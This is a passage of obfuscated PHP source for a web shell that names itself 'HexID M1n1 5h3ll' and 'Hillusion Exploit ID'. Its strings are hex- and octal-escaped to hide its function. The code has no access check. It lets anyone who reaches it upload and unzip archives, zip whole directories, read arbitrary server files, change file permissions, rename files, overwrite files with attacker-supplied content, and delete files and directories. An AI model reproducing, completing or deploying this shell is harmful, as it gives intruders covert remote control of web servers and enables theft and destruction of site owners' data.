"\74\x62\x72\x3e\74\x74\x61\142\154\x65\40\x73\164\171\x6c\x65\x3d\42\142\157\162\144\x65\x72\72\61\x70\x78\40\x73\x6f\x6c\x69\144\40\x6c\151\155\145\x3b\x62\x6f\x72\x64\x65\x72\55\162\x61\144\x69\165\x73\72\x32\160\x78\73\x77\151\144\164\x68\72\x31\x30\x30\45\73\42\76\74\164\144\76\x3c\x63\x65\x6e\x74\145\162\x3e\xa\xa\12\x3c\146\157\x6e\164\40\146\x61\x63\x65\x3d\x22\116\145\x77\40\122\157\143\153\x65\162\42\x20\163\x69\x7a\x65\x3d\x22\65\x22\x3e\40\x5b\x3c\146\157\x6e\164\x20\x63\x6f\x6c\157\162\x3d\42\x6c\151\x6d\145\x22\x3e\40\x41\165\x74\x6f\40\x55\156\x7a\151\x70\40\106\x69\x6c\x65\x20\74\x2f\146\157\156\164\76\x5d\x3c\x2f\x66\157\x6e\x74\x3e\12\74\150\162\40\143\x6f\154\x6f\x72\75\x22\147\162\145\x65\x6e\42\x20\x73\164\x79\154\x65\x3a\x22\x6d\x61\162\147\x69\x6e\55\164\157\160\x3a\x30\x3b\x70\141\x64\144\x69\x6e\x67\x3a\60\x3b\x22\76\74\57\x63\145\x6e\x74\145\x72\x3e\x3c\x66\157\x72\155\40\x65\156\143\164\171\160\x65\75\42\155\x75\x6c\x74\x69\160\141\x72\164\57\146\x6f\162\x6d\55\x64\x61\164\141\42\40\x6d\145\164\x68\157\144\x3d\42\x70\157\163\x74\42\40\x61\x63\164\x69\157\x6e\75\x22\x22\x3e"; echo "\132\151\160\x20\106\x69\x6c\145\40\x3a\x20"; if ($message) { echo "{$message}"; } echo "\x3c\x62\162\x3e\74\142\x72\76\x3c\x69\x6e\x70\165\x74\40\x63\154\141\163\x73\x3d\x22\x6b\x61\156\x22\40\164\171\x70\145\x3d\x22\x66\x69\x6c\x65\42\x20\156\141\155\x65\x3d\x22\x7a\x69\160\x5f\146\x69\154\x65\x22\40\x2f\76\x3c\146\157\x6e\x74\x20\143\157\x6c\157\162\x3d\43\x30\x31\61\x31\x31\x31\61\x3e\154\x6c\154\x6c\154\x6c\x6c\x6c\74\57\146\157\156\x74\x3e\12\x3c\151\156\160\x75\164\x20\143\x6c\141\x73\x73\75\42\153\x61\156\42\x20\x74\x79\x70\x65\x3d\x22\x73\x75\x62\x6d\x69\164\x22\x20\156\x61\155\x65\75\x22\163\x75\x62\155\151\164\x22\40\x76\x61\x6c\165\x65\x3d\x22\125\x6e\172\x69\x70\x22\x20\57\76\12\x3c\57\146\x6f\162\x6d\76\74\x2f\x74\x61\x62\x6c\145\x3e\x3c\x62\x72\76"; if ($message) { echo "\12\74\142\x72\76\x3c\142\162\x3e\x3c\x63\145\x6e\x74\145\x72\76\x3c\141\x20\x68\x72\145\x66\75\x27\x3f\x70\141\x74\150\x3d" . $path . "\x27\76\133\40\x3c\x66\x6f\156\x74\x20\143\157\x6c\x6f\162\x3d\x6c\151\155\x65\76\102\x61\x63\x6b\40\164\x6f\40\150\157\x6d\145\74\x2f\x66\157\156\x74\76\x20\x5d\x3c\57\141\76\x3c\57\143\x65\x6e\164\145\162\x3e\74\x2f\x66\x6f\156\x74\x3e"; } } if ($_GET["\x7a\151\x70"] == "\142\x61\143\x6b\x75\160") { echo "\74\142\162\76\x3c\164\141\142\x6c\x65\x20\x73\x74\171\x6c\x65\x3d\x27\142\157\x72\x64\x65\162\x3a\x31\x70\x78\x20\163\x6f\154\151\x64\40\x6c\x69\x6d\x65\x3b\x62\x6f\162\144\x65\x72\55\162\141\x64\x69\165\x73\x3a\x32\x70\x78\x3b\x77\x69\x64\164\x68\x3a\x31\x30\60\x25\73\47\x3e\74\x74\144\x3e\x3c\143\x65\x6e\164\x65\162\x3e\xa\12\74\146\157\156\x74\x20\146\x61\x63\145\x3d\x27\116\x65\167\40\x52\157\143\x6b\x65\x72\47\x20\x73\151\x7a\145\75\x27\65\x27\76\40\x5b\74\146\x6f\x6e\x74\40\x63\157\x6c\157\162\75\x27\154\x69\155\145\x27\x3e\x20\132\x69\160\40\102\x61\x63\153\x75\x70\x20\x3c\57\x66\x6f\156\x74\x3e\x5d\74\x2f\x66\157\156\x74\76\xa\74\150\162\x20\x63\x6f\154\157\162\75\47\x67\162\x65\x65\x6e\x27\40\x73\164\171\x6c\x65\x3a\47\x6d\141\162\x67\x69\x6e\55\x74\x6f\160\x3a\x30\x3b\x70\x61\x64\x64\151\x6e\x67\72\x30\x3b\x27\76\x3c\57\x63\x65\156\164\x65\x72\x3e\12"; echo "\xa\x3c\142\162\76\x3c\146\157\162\155\40\x61\x63\x74\151\157\156\x3d\x27\x27\x20\x6d\145\164\x68\x6f\x64\75\x27\x70\157\163\164\47\76\74\143\145\x6e\x74\x65\162\x3e\12\x3c\146\x6f\156\164\x20\163\164\171\x6c\x65\75\x27\164\145\170\164\55\x64\x65\143\x6f\162\x61\164\x69\x6f\156\x3a\40\165\156\144\145\x72\x6c\151\156\x65\x3b\47\x3e\106\x6f\x6c\144\145\162\x3a\x20\x3c\x2f\146\x6f\x6e\x74\76\xa\x3c\x69\x6e\160\x75\x74\x20\164\171\160\145\75\x27\x74\145\170\164\x27\x20\x6e\x61\155\145\x3d\47\x64\x69\162\47\x20\166\141\154\165\145\x3d\x27{$dir}\x27\40\x73\x74\171\x6c\145\x3d\47\x77\151\144\x74\x68\x3a\x20\63\x30\60\160\x78\x3b\155\x61\x72\x67\151\x6e\72\65\x70\x78\x20\x61\x75\x74\157\73\x27\40\150\x65\151\x67\150\x74\x3d\47\61\60\x27\x3e\xa\xa\74\142\162\76\x3c\146\x6f\x6e\164\40\x73\164\x79\154\145\75\x27\x74\145\x78\164\x2d\x64\x65\x63\157\x72\x61\x74\151\x6f\156\72\x20\x75\x6e\x64\x65\162\154\x69\156\x65\73\47\x3e\x53\141\x76\x65\40\124\x6f\72\x3c\x2f\x66\157\x6e\164\76\x20\74\151\x6e\160\165\x74\x20\x74\171\160\x65\x3d\47\x74\145\x78\164\47\x20\x6e\x61\155\145\x3d\x27\x73\141\166\x65\x27\x20\x76\141\154\x75\x65\75\47{$dir}\x2f\x68\x65\170\x69\144\137\142\x61\x63\x6b\165\x70\x2e\x7a\151\x70\47\40\x73\x74\x79\154\145\75\x27\x77\151\x64\164\150\x3a\x20\63\x30\60\x70\x78\73\155\141\x72\147\x69\156\72\65\160\x78\40\141\x75\164\x6f\73\47\x20\x68\x65\151\x67\150\164\x3d\47\61\60\47\x3e\xa\12\74\x62\162\76\x3c\151\x6e\160\165\164\x20\x63\154\x61\163\163\x3d\47\x6b\141\x6e\47\40\164\171\x70\145\75\x27\163\165\142\x6d\x69\164\x27\40\156\x61\x6d\145\75\x27\142\x61\x63\153\x75\160\x27\x20\x76\x61\154\x75\x65\75\x27\x42\141\x63\x6b\x55\160\41\47\x20\x73\x74\171\154\x65\75\47\x77\151\144\164\x68\72\x20\62\x31\65\x70\170\x3b\47\x3e\x3c\57\143\x65\x6e\x74\x65\x72\x3e\x3c\57\146\157\162\x6d\76\x3c\x2f\x63\x65\x6e\164\145\162\76\x3c\x2f\x74\x64\76\74\57\x74\141\x62\154\145\x3e"; if ($_POST["\x62\141\x63\153\x75\x70"]) { $save = $_POST["\163\141\x76\145"]; function Zip($source, $destination) { if (extension_loaded("\x7a\151\x70") === true) { if (file_exists($source) === true) { $zip = new ZipArchive(); if ($zip->open($destination, ZIPARCHIVE::CREATE) === true) { $source = realpath($source); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = realpath($file); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . "\x2f", '', $file . "\57")); } else { if (is_file($file) === true) { $zip->addFromString(str_replace($source . "\57", '', $file), file_get_contents($file)); } } } } else { if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } } } return $zip->close(); } } return false; } Zip($_POST["\144\x69\x72"], $save); echo "\74\160\x72\x65\x20\x73\164\x79\x6c\x65\75\47\164\145\170\x74\55\141\x6c\151\x67\x6e\72\40\154\x65\146\x74\73\157\x76\x65\162\x66\x6c\x6f\x77\72\141\165\164\x6f\73\12\160\141\147\x65\x2d\142\162\x65\x61\x6b\55\151\156\163\151\144\x65\72\141\x76\157\151\x64\x3b\12\x64\x69\163\x70\154\x61\171\72\x62\154\157\143\153\73\12\x6d\x61\162\x67\x69\x6e\x3a\65\160\x78\40\141\165\x74\157\73\12\x6d\141\162\x67\151\156\x2d\x74\157\160\72\x35\x70\x78\73\12\160\141\144\x64\x69\x6e\147\x3a\63\x70\170\73\12\x6d\x61\x72\x67\x69\156\x2d\142\x6f\164\164\x6f\x6d\72\x33\x70\170\x3b\12\167\x6f\162\144\x2d\x62\162\145\x61\x6b\x3a\142\x72\145\x61\153\x2d\x61\x6c\154\73\xa\167\x6f\x72\x64\55\167\162\141\x70\x3a\142\x72\x65\141\x6b\55\167\x6f\x72\144\73\xa\142\x6f\x72\144\145\162\72\40\x31\160\x78\x20\163\x6f\x6c\151\x64\40\x77\x68\151\164\x65\x3b\xa\142\x6f\162\144\145\162\55\162\x61\144\151\165\163\x3a\66\160\x78\x3b\xa\x62\x6f\162\144\145\x72\55\x72\x69\147\150\x74\x3a\x62\154\x61\143\153\73\12\142\157\x72\x64\145\162\x2d\x6c\145\146\x74\72\142\154\x61\143\x6b\x3b\12\142\x61\143\x6b\147\x72\x6f\165\156\144\x2d\143\x6f\154\x6f\162\72\x64\x61\x72\x6b\x73\x6c\x61\x74\x65\x67\162\141\171\73\xa\x64\x69\x72\145\143\164\x69\x6f\x6e\x3a\x6c\x74\x72\x3b\47\x3e\74\146\x6f\x6e\x74\40\143\157\154\157\162\x3d\154\x69\155\145\76\x44\157\x6e\145\x20\x53\165\143\x63\145\163\x66\165\154\x6c\171\74\57\146\x6f\156\164\76\54\x20\x53\141\x76\x65\x20\x54\x6f\x3a\40\74\142\76\40{$save}\40\74\57\x62\76\74\57\160\x72\145\x3e\x3c\142\x72\x3e"; } } if ($_GET["\165\x6e\172\151\x70"] == "\155\141\156\x75\x61\x6c") { echo "\74\x62\x72\76\x3c\x74\141\142\154\145\40\163\164\x79\x6c\145\75\47\142\157\x72\144\145\162\x3a\x31\x70\170\x20\x73\157\x6c\x69\x64\x20\154\151\155\145\x3b\x62\x6f\x72\144\x65\x72\55\162\x61\x64\151\165\163\72\62\160\170\73\x77\151\144\164\150\x3a\61\x30\60\x25\x3b\47\76\74\x74\x64\76\74\143\x65\156\164\x65\x72\x3e\12\xa\x3c\x66\x6f\x6e\164\x20\x66\141\143\145\x3d\x27\116\145\x77\40\122\x6f\x63\x6b\145\x72\47\x20\x73\151\172\x65\x3d\x27\x35\47\x3e\x20\133\x3c\x66\x6f\156\x74\40\x63\157\x6c\x6f\x72\75\47\x6c\x69\155\x65\47\x3e\40\125\x6e\132\x69\160\x20\x4d\141\x6e\165\x61\x6c\x20\x3c\57\146\157\156\164\76\x5d\74\x2f\146\157\156\x74\76\12\x3c\150\x72\40\143\x6f\x6c\157\x72\75\x27\x67\x72\145\145\156\47\x20\163\x74\171\x6c\145\x3a\47\x6d\141\x72\147\151\156\x2d\x74\157\160\x3a\60\x3b\x70\141\144\x64\x69\156\x67\72\x30\73\47\76\12"; echo "\74\x66\x6f\x72\x6d\x20\x61\x63\x74\151\157\156\75\47\47\x20\x6d\x65\x74\150\157\144\75\47\160\x6f\x73\164\47\76\x3c\146\x6f\x6e\164\x20\x73\x74\171\154\145\x3d\x27\164\x65\x78\164\x2d\x64\145\143\x6f\162\141\x74\151\157\x6e\x3a\x20\165\x6e\x64\145\x72\154\x69\x6e\145\73\47\x3e\x5a\151\x70\40\x4c\x6f\x63\x61\x74\x69\157\156\x3a\74\x2f\x66\157\x6e\x74\76\74\x62\x72\76\74\x69\156\160\x75\x74\x20\164\x79\160\x65\75\x27\164\145\170\164\x27\x20\x6e\x61\x6d\145\75\x27\144\x69\162\144\x27\40\x76\x61\x6c\165\145\75\47{$dir}\x2f\146\x69\x6c\x65\56\172\151\x70\47\x20\163\164\x79\x6c\145\75\x27\x77\x69\144\x74\x68\x3a\x20\63\x30\x30\160\170\73\x6d\x61\x72\147\151\x6e\72\65\x70\170\x20\141\165\x74\x6f\73\47\40\150\145\x69\x67\x68\x74\x3d\47\61\x30\x27\x3e\74\x62\162\76\x3c\x66\157\x6e\164\40\163\x74\x79\x6c\x65\x3d\x27\x74\x65\x78\164\x2d\144\145\x63\157\162\141\x74\x69\x6f\x6e\x3a\x20\165\x6e\144\145\x72\x6c\x69\156\x65\73\x27\x3e\123\141\x76\x65\40\x54\157\72\74\57\146\x6f\156\164\x3e\x3c\x62\x72\x3e\74\151\156\x70\x75\x74\40\x74\x79\160\145\75\x27\164\145\x78\164\x27\x20\x6e\141\x6d\145\x3d\47\x73\141\166\x65\47\40\x76\x61\x6c\165\x65\x3d\x27{$dir}\x2f\150\x65\170\x69\x64\x5f\x75\156\172\x69\x70\x27\40\x73\164\171\x6c\x65\75\47\x77\151\x64\164\x68\72\x20\x33\x30\60\160\x78\x3b\x6d\x61\162\x67\x69\156\72\x35\160\x78\40\141\x75\164\x6f\73\x27\x20\x68\145\151\147\150\164\75\47\x31\60\x27\x3e\x3c\142\162\76\x3c\x69\156\160\x75\x74\40\x63\154\141\x73\163\x3d\x27\153\x61\156\47\x20\164\171\160\x65\x3d\47\163\x75\x62\x6d\151\164\47\40\156\141\155\x65\75\47\x65\170\x74\162\x61\153\x27\40\x76\141\x6c\165\145\x3d\47\125\x6e\x7a\x69\x70\41\x27\40\163\164\171\154\x65\75\x27\167\x69\x64\x74\150\x3a\x20\62\x31\x35\x70\x78\x3b\47\x3e\x3c\x2f\146\157\x72\155\x3e\74\x2f\143\145\x6e\164\145\x72\76"; if ($_POST["\x65\170\x74\x72\141\153"]) { $save = $_POST["\x73\x61\166\145"]; $zip = new ZipArchive(); $res = $zip->open($_POST["\x64\x69\162\144"]); if ($res === TRUE) { $zip->extractTo($save); $zip->close(); echo "\x3c\57\164\x64\76\x3c\57\x74\x61\x62\154\x65\x3e\74\160\162\145\40\163\x74\171\154\145\x3d\x27\164\x65\x78\164\55\141\x6c\151\147\156\x3a\x20\x6c\x65\x66\x74\73\x6f\166\x65\162\146\154\157\x77\72\x61\x75\x74\x6f\73\12\160\141\147\145\55\x62\162\145\141\x6b\x2d\151\x6e\x73\151\x64\x65\x3a\141\x76\x6f\x69\144\x3b\xa\144\x69\x73\160\x6c\141\171\72\x62\154\x6f\143\x6b\x3b\xa\x6d\141\162\x67\x69\156\x3a\65\x70\x78\x20\141\165\x74\157\x3b\xa\155\x61\x72\147\x69\x6e\x2d\x74\x6f\x70\72\x35\160\x78\73\12\x70\141\x64\144\x69\x6e\147\72\63\x70\x78\73\xa\155\141\x72\x67\151\156\x2d\x62\157\x74\x74\157\155\x3a\63\160\x78\73\xa\167\157\162\x64\x2d\142\x72\x65\x61\x6b\x3a\x62\162\145\x61\x6b\55\x61\x6c\154\x3b\xa\167\157\x72\144\x2d\x77\x72\141\160\72\x62\x72\145\x61\153\55\x77\x6f\162\x64\73\12\x62\x6f\x72\144\145\162\72\x20\61\160\170\40\x73\157\154\151\144\x20\x77\x68\151\x74\x65\x3b\xa\x62\157\162\x64\145\x72\x2d\x72\141\x64\151\165\x73\x3a\x36\160\x78\x3b\12\142\x6f\162\x64\145\x72\55\162\x69\x67\150\164\72\x62\x6c\x61\143\153\x3b\12\142\157\x72\144\145\x72\x2d\154\145\146\x74\x3a\x62\x6c\141\143\153\73\12\142\x61\143\x6b\147\162\x6f\x75\156\144\x2d\x63\157\x6c\157\162\x3a\144\141\162\153\163\154\141\164\145\x67\x72\141\x79\x3b\12\x64\x69\162\145\143\x74\x69\157\x6e\72\x6c\164\x72\x3b\47\76\x3c\146\157\x6e\x74\x20\143\x6f\x6c\x6f\x72\75\154\151\x6d\x65\76\x44\x6f\x6e\145\40\123\165\x63\x63\145\163\146\165\154\154\171\x3c\57\146\157\x6e\164\76\54\40\114\157\x63\x61\164\151\157\x6e\x3a\40\74\142\x3e{$save}\x3c\57\142\x3e\x3c\x2f\160\162\145\x3e"; } else { echo "\x3c\150\x72\x20\163\x74\171\154\145\x3d\x27\155\141\162\x67\x69\x6e\55\142\x6f\164\x74\x6f\x6d\72\60\x3b\47\76\74\x66\157\156\164\x20\143\157\154\x6f\x72\x3d\x72\145\144\x3e\74\x62\76\x3c\x63\x65\156\x74\145\x72\x3e\x55\156\172\x69\160\x20\106\x61\151\154\145\144\74\x2f\x63\145\156\164\145\162\76\74\57\142\76\x3c\57\x66\157\x6e\164\x3e\74\x68\x72\40\x73\164\171\154\145\x3d\47\155\x61\162\147\151\156\x2d\164\157\x70\x3a\60\73\47\x3e"; } } } if (isset($_GET["\x65\170\151\164"])) { session_destroy(); alert("\124\x68\141\x6e\153\x73\x20\x74\x6f\40\165\x73\145\x20\155\x79\x20\x70\162\x6f\x6a\145\143\164\40\110\145\x78\x49\x44\x20\115\x31\156\61\40\65\x68\63\154\x6c\40\x43\x6f\160\171\x72\x69\x67\150\164\40\62\60\61\x39\40\124\x65\170\67\x75\x72\145\x20\x2d\x20\110\x69\x6c\x6c\165\163\151\x6f\x6e\x20\x45\x78\x70\x6c\157\x69\164\40\x49\x44"); kabur("\77\150\x6f\x6d\145"); } if (isset($_GET["\x66\151\154\145\x73\x72\x63"])) { echo "\x3c\x62\x72\x3e\x3c\x70\x72\145\40\x73\164\x79\x6c\x65\75\47\x74\x65\170\164\55\141\154\151\147\x6e\x3a\x20\154\145\146\x74\73\x6f\x76\145\x72\x66\x6c\157\x77\72\x61\x75\x74\157\73\12\160\x61\147\x65\x2d\142\x72\145\x61\x6b\x2d\151\x6e\x73\x69\144\x65\72\141\166\157\x69\x64\x3b\xa\x64\x69\163\x70\154\141\x79\x3a\x62\x6c\157\x63\153\73\xa\x6d\141\162\147\151\156\72\x35\x70\170\40\141\165\x74\157\x3b\12\155\141\x72\147\151\x6e\55\164\157\160\x3a\x35\x70\x78\73\12\160\141\x64\144\151\x6e\147\72\x33\x70\170\x3b\xa\x6d\141\162\147\151\x6e\x2d\x62\x6f\x74\x74\x6f\155\x3a\x33\160\170\73\xa\x77\157\x72\x64\x2d\142\162\145\141\153\72\x62\162\145\x61\153\55\141\154\154\73\12\167\157\x72\x64\55\167\162\141\160\x3a\142\x72\145\141\x6b\55\x77\x6f\162\x64\x3b\12\x62\x6f\162\144\145\x72\72\40\x31\160\170\x20\x73\157\x6c\x69\x64\x20\x77\150\151\x74\x65\x3b\12\142\157\162\x64\145\162\x2d\162\141\144\x69\x75\x73\x3a\66\x70\x78\73\12\x62\157\x72\144\x65\162\x2d\x72\151\147\x68\164\72\x62\154\x61\143\153\x3b\12\x62\157\162\144\x65\162\55\x6c\x65\x66\164\72\142\x6c\x61\x63\x6b\73\xa\142\141\143\153\147\162\157\x75\156\144\55\143\x6f\x6c\x6f\162\72\x23\60\61\x31\61\x31\61\73\12\x64\x69\162\145\x63\x74\x69\157\156\72\x6c\x74\x72\x3b\47\x3e\74\x66\x6f\x6e\x74\40\x73\x69\x7a\x65\75\x27\62\x27\40\x63\157\x6c\157\162\x3d\x27\154\x69\155\145\x27\x3e\x46\x69\x6c\145\72"; echo $_GET["\x66\151\x6c\x65\163\x72\x63"]; echo "\x3c\57\160\162\145\x3e\74\x2f\146\157\156\164\76"; $html = htmlspecialchars(file_get_contents($_GET["\146\x69\x6c\145\163\x72\143"])); echo "\74\x66\162\x6f\x6d\76\x3c\x63\x65\156\x74\145\162\76\x3c\164\x65\170\164\x61\162\145\x61\40\143\x6f\154\163\x3d\64\62\x20\x72\x6f\x77\163\x3d\x32\60\x20\163\164\171\x6c\x65\75\47\157\156\x66\x6f\143\x75\163\50\x29\x3b\143\x6f\x6c\x6f\162\72\167\x68\x69\164\x65\73\x62\x61\x63\x6b\x67\162\x6f\165\156\x64\x3a\x20\43\60\x31\61\61\61\61\73\x62\157\162\144\145\162\55\162\141\x64\x69\165\x73\x3a\x36\x70\x78\x3b\142\157\162\x64\x65\x72\72\40\61\x70\x78\x20\154\151\155\x65\x20\x73\x6f\x6c\x69\144\73\x27\x20\x72\145\x61\x64\157\156\154\171\76" . $html . "\74\57\x74\145\x78\x74\x61\x72\145\x61\76\x3c\57\x63\x65\156\x74\145\x72\x3e\74\57\x66\x72\x6f\155\76"; } elseif (isset($_GET["\157\160\164\151\x6f\156"]) && $_POST["\157\160\164"] != "\x64\x65\154\145\x74\145") { echo "\x3c\57\x74\141\142\x6c\145\x3e\74\x62\162\40\57\76\74\143\145\156\x74\x65\x72\x3e" . $_POST["\160\x61\x74\x68"] . "\74\x62\162\x20\57\76\74\142\x72\x20\57\x3e"; if ($_POST["\x6f\160\164"] == "\x63\150\155\157\x64") { if (isset($_POST["\160\x65\162\x6d"])) { if (chmod($_POST["\x70\141\164\150"], $_POST["\160\145\162\155"])) { alert("\x43\x68\141\x6e\x67\x65\40\x50\x65\x72\155\x69\x73\x73\x69\157\x6e\40\123\165\x63\143\145\163\x73"); } else { alert("\103\150\141\x6e\x67\x65\x20\x50\145\x72\x6d\x69\x73\163\151\157\156\x20\x46\x61\x69\154\x65\x64"); } } echo "\x3c\146\x6f\x72\x6d\40\155\145\x74\150\x6f\x64\x3d\x22\120\x4f\x53\x54\42\x3e\xa\x50\145\x72\x6d\x69\163\163\x69\x6f\156\x20\x3a\40\74\151\x6e\x70\x75\x74\x20\143\x6c\141\163\163\x3d\x22\153\x61\156\42\40\x6e\141\x6d\145\75\x22\x70\145\162\155\x22\x20\164\x79\160\145\x3d\x22\164\x65\170\164\x22\40\163\x69\x7a\x65\x3d\x22\x34\42\40\166\141\154\x75\x65\75\42" . substr(sprintf("\45\x6f", fileperms($_POST["\160\x61\164\x68"])), -4) . "\x22\x20\x2f\76\xa\x3c\x69\156\x70\165\164\x20\164\171\160\145\75\x22\x68\151\144\144\145\x6e\x22\40\x6e\141\155\145\x3d\42\160\x61\164\150\x22\x20\166\x61\x6c\165\x65\x3d\42" . $_POST["\160\141\164\x68"] . "\x22\76\12\x3c\x69\x6e\x70\165\164\40\164\171\x70\x65\75\42\x68\x69\144\144\145\x6e\x22\x20\x6e\x61\155\145\x3d\x22\157\x70\164\x22\40\x76\x61\x6c\165\145\x3d\42\x63\150\155\x6f\144\42\x3e\12\74\151\156\160\165\164\40\143\154\141\x73\x73\75\x22\x6b\x61\x6e\42\40\x74\x79\160\145\x3d\x22\163\x75\142\155\151\x74\x22\x20\166\141\x6c\x75\x65\x3d\x22\x47\157\42\x20\x2f\x3e\12\74\57\x66\157\x72\x6d\76"; } elseif ($_POST["\157\x70\164"] == "\162\x65\x6e\x61\x6d\x65") { if (isset($_POST["\156\x65\x77\156\141\155\x65"])) { if (rename($_POST["\x70\x61\x74\x68"], $path . "\57" . $_POST["\156\x65\x77\156\x61\155\145"])) { alert("\x52\145\156\x61\x6d\145\40\x53\165\143\143\145\x73\163"); kabur("\x3f\x70\141\x74\x68\75{$path}"); } else { alert("\x52\x65\156\x61\155\x65\40\106\x61\151\154\145\x64"); } $_POST["\x6e\141\x6d\x65"] = $_POST["\x6e\145\x77\156\x61\155\x65"]; } echo "\74\146\157\x72\155\x20\155\x65\164\150\x6f\144\75\x22\x50\117\x53\124\42\76\116\x65\167\40\116\x61\x6d\x65\40\72\x20\xa\74\x69\x6e\160\x75\x74\x20\143\154\x61\163\x73\75\42\153\141\156\42\40\156\141\x6d\145\x3d\x22\x6e\x65\x77\x6e\x61\x6d\x65\42\x20\x74\x79\160\145\75\x22\x74\145\x78\x74\42\x20\x73\x69\x7a\145\75\x22\62\x30\42\x20\166\141\x6c\x75\x65\75\x22" . $_POST["\x6e\141\155\145"] . "\x22\40\57\x3e\xa\74\151\156\x70\165\164\40\x74\x79\x70\145\x3d\x22\x68\x69\x64\x64\x65\156\42\40\x6e\x61\155\x65\x3d\42\160\x61\164\x68\42\x20\166\141\x6c\x75\145\75\x22" . $_POST["\160\141\164\x68"] . "\42\76\xa\x3c\x69\x6e\160\165\x74\40\x74\x79\160\145\x3d\42\x68\151\x64\x64\145\x6e\42\40\x6e\141\x6d\x65\75\42\157\x70\x74\42\40\166\x61\x6c\165\145\75\x22\x72\145\156\x61\x6d\x65\42\x3e\xa\74\x69\156\x70\x75\x74\x20\x63\x6c\141\163\x73\75\x22\x6b\x61\156\42\x20\164\x79\160\x65\x3d\x22\x73\x75\142\x6d\x69\164\x22\x20\166\x61\x6c\x75\145\75\x22\x53\141\x76\x65\x22\x20\57\76\12\x3c\57\x66\157\x72\x6d\76"; } elseif ($_POST["\157\160\x74"] == "\145\144\x69\x74") { if (isset($_POST["\x73\x72\143"])) { $fp = fopen($_POST["\x70\141\164\x68"], "\x77"); if (fwrite($fp, $_POST["\163\162\143"])) { echo "\x3c\164\x61\142\x6c\x65\40\163\164\x79\x6c\145\75\42\x62\141\x63\x6b\x67\x72\x6f\165\156\x64\72\40\x23\x30\61\61\x31\61\x31\x3b\x62\157\x72\x64\145\162\55\x72\141\x64\x69\x75\163\72\66\x70\170\x3b\142\157\162\x64\145\162\x3a\x20\x31\x70\x78\40\154\151\x6d\145\x20\163\157\x6c\151\144\x3b\x22\40\167\x69\144\164\x68\75\42\x31\60\x30\x25\42\40\40\x61\154\x69\x67\x6e\x3d\x22\x63\x65\156\x74\x65\162\42\x3e\x3c\x74\x64\76"; echo "\x3c\x66\x6f\x6e\164\x20\x63\157\154\157\x72\75\42\x6c\x69\x6d\x65\x22\76\123\165\143\x63\x65\163\163\x20\x45\144\x69\x74\40\x46\151\x6c\x65\x3c\x2f\146\157\x6e\164\x3e\74\x62\x72\57\76"; } else { echo "\74\146\x6f\156\x74\40\x63\x6f\154\157\162\75\42\x72\145\x64\x22\76\x46\141\151\x6c\145\144\40\105\144\x69\x74\40\x46\x69\154\x65\x3c\x2f\x66\157\156\164\76\74\x62\x72\57\x3e\x3c\57\x74\x61\x62\154\145\x3e"; } fclose($fp); } echo "\74\146\157\162\155\x20\155\x65\164\150\x6f\144\x3d\42\x50\117\x53\124\x22\76\12\x3c\x74\145\x78\x74\x61\162\145\x61\40\x63\154\x61\163\x73\75\42\x63\157\x6c\x7a\42\x20\x63\x6f\154\163\75\x34\62\x20\162\157\167\163\x3d\62\x30\x20\156\x61\155\145\75\42\x73\x72\143\x22\x3e" . htmlspecialchars(file_get_contents($_POST["\160\x61\164\150"])) . "\x3c\x2f\164\x65\170\164\141\162\145\x61\76\x3c\x62\x72\40\57\76\12\xa\x3c\x69\156\160\x75\x74\x20\x74\x79\160\145\75\42\150\x69\x64\144\145\x6e\x22\x20\x6e\x61\x6d\145\75\x22\x70\141\164\150\42\x20\x76\141\154\165\145\x3d\42" . $_POST["\x70\x61\164\150"] . "\x22\x3e\xa\74\x69\x6e\160\165\x74\40\164\x79\160\x65\x3d\x22\x68\151\x64\144\145\x6e\x22\x20\156\x61\155\145\x3d\x22\x6f\x70\x74\x22\x20\x76\141\154\x75\x65\x3d\x22\145\x64\x69\164\42\x3e\12\x3c\151\x6e\160\165\x74\40\x63\x6c\x61\163\163\x3d\x22\x6b\x61\156\42\40\x73\164\x79\x6c\145\75\42\167\151\144\x74\150\x3a\71\71\45\42\40\x74\x79\160\x65\75\x22\x73\x75\x62\155\151\164\42\40\x76\x61\x6c\165\145\75\x22\123\141\166\x65\42\40\x2f\76\12\x3c\x2f\x66\157\x72\x6d\x3e\74\57\x74\141\142\x6c\x65\x3e"; } echo "\74\57\x63\145\156\164\145\162\x3e"; } else { echo "\x3c\142\162\x2f\76\x3c\143\145\x6e\164\145\162\76"; if (isset($_GET["\157\160\x74\x69\157\x6e"]) && $_POST["\x6f\160\x74"] == "\x64\145\x6c\x65\164\x65") { if ($_POST["\x74\x79\x70\145"] == "\x64\151\x72") { if (rmdir($_POST["\x70\x61\164\x68"])) { alert("\124\150\x65\40\x64\151\162\x65\143\164\157\x72\x79\x20\150\x61\x73\x20\142\x65\x65\x6e\x20\x64\145\154\x65\x74\x65\x64\40\x3a\166"); } else { alert("\x44\x69\x72\145\143\164\x6f\x72\171\40\146\x61\x69\154\x65\144\40\164\157\x20\144\145\154\x65\164\145\40\x3a\104"); } } elseif ($_POST["\164\x79\x70\145"] == "\146\151\x6c\x65") { if (unlink($_POST["\x70\141\x74\x68"])) { alert("\124\x68\145\40\x66\151\x6c\145\40\x68\x61\163\40\142\145\145\156\40\144\x65\x6c\x65\164\x65\144\x20\x3a\x76"); } else { alert("\x46\151\x6c\145\40\146\x61\x69\154\145\x64\40\x74\157\40\144\x65\x6c\x65\x74\x65\40\72\104"); } } } echo "\74\x2f\143\145\x6e\164\145\162\x3e"; $scandir = scandir($path); echo "\74\144\151\x76\40\x69\144\x3d\42\x63\157\156\x74\145\156\x74\x22\x3e\x3c\x74\141\142\154\x65\x20\x73\x74\x79\x6c\145\x3d\x22\x64\x69\162\x65\143\x74\151\x6f\156\x3a\154\164\162\73\157\166\145\x72\x66\x6c\x6f\167\72\141\165\164\157\x3b\x70\x61\x67\x65\x2d\x62\x72\x65\141\x6b\55\x69\x6e\163\x69\x64\145\72\x61\166\x6f\151\144\x3b\x62\141\143\x6b\x67\x72\x6f\165\156\x64\x3a\x20\43\60\61\x31\61\x31\61\x3b\142\157\162\144\x65\162\x2d\162\x61\x64\151\x75\x73\72\x36\x70\x78\x3b\142\157\162\x64\x65\162\72\x20\x31\x70\x78\40\154\x69\x6d\145\x20\x73\x6f\x6c\151\x64\x3b\42\40\167\151\144\x74\150\75\42\61\60\60\45\x22\x20\143\145\x6c\x6c\160\x61\144\144\x69\x6e\x67\x3d\42\x32\42\40\40\x61\154\151\147\156\x3d\x22\x63\